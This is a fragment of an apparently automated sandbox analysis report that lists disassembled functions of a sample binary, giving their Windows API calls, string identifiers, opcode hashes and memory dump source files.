                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 1506413516-4153970271
                                                • Opcode ID: ffda2e1baceb75ca0b5c30d65c3fbbb74f1d596929a8e19c7c698f49903d1cde
                                                • Instruction ID: 44378613be6286455d01815d98f14fcdde54afad95fcef51412271c964698ef0
                                                • Opcode Fuzzy Hash: ffda2e1baceb75ca0b5c30d65c3fbbb74f1d596929a8e19c7c698f49903d1cde
                                                • Instruction Fuzzy Hash: CC217E7290021AABCF12FF90CC0AEEE7739BF18300F04446AF50566161EA759618EB51
                                                APIs
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                  • Part of subcall function 00F87924: _memmove.LIBCMT ref: 00F879AD
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FE5330
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FE5346
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FE5357
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FE5369
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FE537A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: 57f6ece6b4b64b78b040fd19ac2fb050d0dd54e1264e31edbc42bdcd412dca71
                                                • Instruction ID: 9b7516f83a85a30e613d3b95fa4e954a42eaef1460310f7bb80a7c073875362e
                                                • Opcode Fuzzy Hash: 57f6ece6b4b64b78b040fd19ac2fb050d0dd54e1264e31edbc42bdcd412dca71
                                                • Instruction Fuzzy Hash: 8811BF31A502697AD720B663DC4AEFFBBBCFBD5F54F00056AB451A6091EAA08D04D6A0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: 642373557f785cb3684fce88b739ff70744f3d467cf3ee3421ec3bc6a274716b
                                                • Instruction ID: cf534c4989231d5b8171d2182af9a96a9e2a52f6724ad66d965e3fe34faef3e9
                                                • Opcode Fuzzy Hash: 642373557f785cb3684fce88b739ff70744f3d467cf3ee3421ec3bc6a274716b
                                                • Instruction Fuzzy Hash: 4F1127719001156FCB31AB35DC4AEDE77BCEF46721F0001AAF485D6091EF799A81BB91
                                                APIs
                                                • timeGetTime.WINMM ref: 00FE4F7A
                                                  • Part of subcall function 00FA049F: timeGetTime.WINMM(?,7694B400,00F90E7B), ref: 00FA04A3
                                                • Sleep.KERNEL32(0000000A), ref: 00FE4FA6
                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00FE4FCA
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FE4FEC
                                                • SetActiveWindow.USER32 ref: 00FE500B
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FE5019
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FE5038
                                                • Sleep.KERNEL32(000000FA), ref: 00FE5043
                                                • IsWindow.USER32 ref: 00FE504F
                                                • EndDialog.USER32(00000000), ref: 00FE5060
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 369a707627dd3ac1ce0f2b85bb2930b7e7a4353a108d3331406f9886f7dd1a28
                                                • Instruction ID: 00f506ae0fe099b5a7edcd7fd1b0b3d1b19b9cb6cbed9c03de2dab080d75c637
                                                • Opcode Fuzzy Hash: 369a707627dd3ac1ce0f2b85bb2930b7e7a4353a108d3331406f9886f7dd1a28
                                                • Instruction Fuzzy Hash: 5B21D7B8A043426FE7315F31EEC8B663B69FB4BB55F041018F28182199DB7B5D00B7A2
                                                APIs
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • CoInitialize.OLE32(00000000), ref: 00FED5EA
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FED67D
                                                • SHGetDesktopFolder.SHELL32(?), ref: 00FED691
                                                • CoCreateInstance.OLE32(01012D7C,00000000,00000001,01038C1C,?), ref: 00FED6DD
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FED74C
                                                • CoTaskMemFree.OLE32(?,?), ref: 00FED7A4
                                                • _memset.LIBCMT ref: 00FED7E1
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00FED81D
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FED840
                                                • CoTaskMemFree.OLE32(00000000), ref: 00FED847
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FED87E
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 00FED880
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: 11aead321879520ce6a0436977c7057c7406b8465ad522af8d8cdf3ba639171a
                                                • Instruction ID: 0125e783d70660a99bc5f104bf151e90279fa19c87595676a7376135a068cdaa
                                                • Opcode Fuzzy Hash: 11aead321879520ce6a0436977c7057c7406b8465ad522af8d8cdf3ba639171a
                                                • Instruction Fuzzy Hash: 6BB10875A00109AFDB14DFA5C888EAEBBB9FF48314F148499F809EB251DB34EE45DB50
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 00FDC283
                                                • GetWindowRect.USER32(00000000,?), ref: 00FDC295
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FDC2F3
                                                • GetDlgItem.USER32(?,00000002), ref: 00FDC2FE
                                                • GetWindowRect.USER32(00000000,?), ref: 00FDC310
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FDC364
                                                • GetDlgItem.USER32(?,000003E9), ref: 00FDC372
                                                • GetWindowRect.USER32(00000000,?), ref: 00FDC383
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FDC3C6
                                                • GetDlgItem.USER32(?,000003EA), ref: 00FDC3D4
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FDC3F1
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDC3FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                                                • Instruction ID: 65de16fc721633535a6a20b813869fb66c5a28983dd83bd9e099bb6030880c0d
                                                • Opcode Fuzzy Hash: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                                                • Instruction Fuzzy Hash: 54515171B00206ABDB18CFB9DD85A6DBBBAFB88311F14812DF515D7294DB719D00DB50
                                                APIs
                                                  • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F820D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00F8216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00FBBCA6
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBCD7
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBCEE
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBD0A
                                                • DeleteObject.GDI32(00000000), ref: 00FBBD1C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: d5b64250b3aa19364d792654a159be4332648223c4810b673023b503a3dad958
                                                • Instruction ID: a968efd5e49a0305a64f205a57f9b90656e3c62f6cdf0957425238bde5afbdd8
                                                • Opcode Fuzzy Hash: d5b64250b3aa19364d792654a159be4332648223c4810b673023b503a3dad958
                                                • Instruction Fuzzy Hash: B8618C75900A01DFDB36EF15D988BA9B7F1FF44322F10452DE4829A564CB7AB881EF50
                                                APIs
                                                  • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                • GetSysColor.USER32(0000000F), ref: 00F821D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: be93f101a3150fe7b0b96dfc51549b570fddce2977bd537b15341500b58dcc8f
                                                • Instruction ID: f71d300f7456f454b21e6ee0b4b17466f0a43b30d8913849298c37a3ff8cd170
                                                • Opcode Fuzzy Hash: be93f101a3150fe7b0b96dfc51549b570fddce2977bd537b15341500b58dcc8f
                                                • Instruction Fuzzy Hash: B241A2315005409BEB72AF28D888BF93B65EB06331F144265FEA58A1E5C7769C42FB61
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,0100F910), ref: 00FEA90B
                                                • GetDriveTypeW.KERNEL32(00000061,010389A0,00000061), ref: 00FEA9D5
                                                • _wcscpy.LIBCMT ref: 00FEA9FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: 798067379965d7f4fb77997a49de06bd853ac94f35bc00248f3c0c9d2996030b
                                                • Instruction ID: 0dfd37e23c23642e7fd231d8974bd56e6f3aae89c9cfae78b2951dd40b2231dd
                                                • Opcode Fuzzy Hash: 798067379965d7f4fb77997a49de06bd853ac94f35bc00248f3c0c9d2996030b
                                                • Instruction Fuzzy Hash: 4651EC315083419BC310EF15CC92AAFB7A9FF85714F18482EF486572A2DB78E909EB43
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: 88e30ff2924f25bf0fff827959d6da351bde14dcedd25d3b176c195ecf897edd
                                                • Instruction ID: 873261d2473962061bff479af475f66cf2764fc10f01bdf02962481703e26a7e
                                                • Opcode Fuzzy Hash: 88e30ff2924f25bf0fff827959d6da351bde14dcedd25d3b176c195ecf897edd
                                                • Instruction Fuzzy Hash: D3411972A04206AFDB24EF35DC46FBA73E8EF46310F28446EE449D7241EA759905AB10
                                                APIs
                                                • _memset.LIBCMT ref: 0100716A
                                                • CreateMenu.USER32 ref: 01007185
                                                • SetMenu.USER32(?,00000000), ref: 01007194
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007221
                                                • IsMenu.USER32(?), ref: 01007237
                                                • CreatePopupMenu.USER32 ref: 01007241
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0100726E
                                                • DrawMenuBar.USER32 ref: 01007276
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: 57f854bce77e6cdb927e5b4271fdca11ef5a2f294adfe0e1dc1bc52caedf97fb
                                                • Instruction ID: 5a31c71ce4d838a5cf498308105b8e10a4333bb597841b552e874fbc48403eee
                                                • Opcode Fuzzy Hash: 57f854bce77e6cdb927e5b4271fdca11ef5a2f294adfe0e1dc1bc52caedf97fb
                                                • Instruction Fuzzy Hash: 82418C74A01205EFEB61DF68D984E9A7BF5FF08310F140068FA85A7391DB3AA910DF90
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0100755E
                                                • CreateCompatibleDC.GDI32(00000000), ref: 01007565
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01007578
                                                • SelectObject.GDI32(00000000,00000000), ref: 01007580
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0100758B
                                                • DeleteDC.GDI32(00000000), ref: 01007594
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0100759E
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010075B2
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010075BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: 22614af7415d4a9ffbac1301841539d834b9e59ce80e7bc9cc33f7970965bfbd
                                                • Instruction ID: babe8eb6e6e70a76bb84b68ba289901502d58afc5e36e9df6a78e63092f31343
                                                • Opcode Fuzzy Hash: 22614af7415d4a9ffbac1301841539d834b9e59ce80e7bc9cc33f7970965bfbd
                                                • Instruction Fuzzy Hash: 3F316171100215BBEF239F64DC08FDA3BA9FF09761F114214FA95960D0C77AE811DB64
                                                APIs
                                                • _memset.LIBCMT ref: 00FA6E3E
                                                  • Part of subcall function 00FA8B28: __getptd_noexit.LIBCMT ref: 00FA8B28
                                                • __gmtime64_s.LIBCMT ref: 00FA6ED7
                                                • __gmtime64_s.LIBCMT ref: 00FA6F0D
                                                • __gmtime64_s.LIBCMT ref: 00FA6F2A
                                                • __allrem.LIBCMT ref: 00FA6F80
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA6F9C
                                                • __allrem.LIBCMT ref: 00FA6FB3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA6FD1
                                                • __allrem.LIBCMT ref: 00FA6FE8
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7006
                                                • __invoke_watson.LIBCMT ref: 00FA7077
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                • Instruction ID: 792cd0c712047b25ff647cc211166dd5b1410894b4c970dac0896476cd1c17f6
                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                • Instruction Fuzzy Hash: AF7118F6E00716ABD714AF79CC81B9AB7A8AF06724F148229F514D6281F774E900ABD0
                                                APIs
                                                • _memset.LIBCMT ref: 00FE2542
                                                • GetMenuItemInfoW.USER32(01045890,000000FF,00000000,00000030), ref: 00FE25A3
                                                • SetMenuItemInfoW.USER32(01045890,00000004,00000000,00000030), ref: 00FE25D9
                                                • Sleep.KERNEL32(000001F4), ref: 00FE25EB
                                                • GetMenuItemCount.USER32(?), ref: 00FE262F
                                                • GetMenuItemID.USER32(?,00000000), ref: 00FE264B
                                                • GetMenuItemID.USER32(?,-00000001), ref: 00FE2675
                                                • GetMenuItemID.USER32(?,?), ref: 00FE26BA
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FE2700
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2714
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2735
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
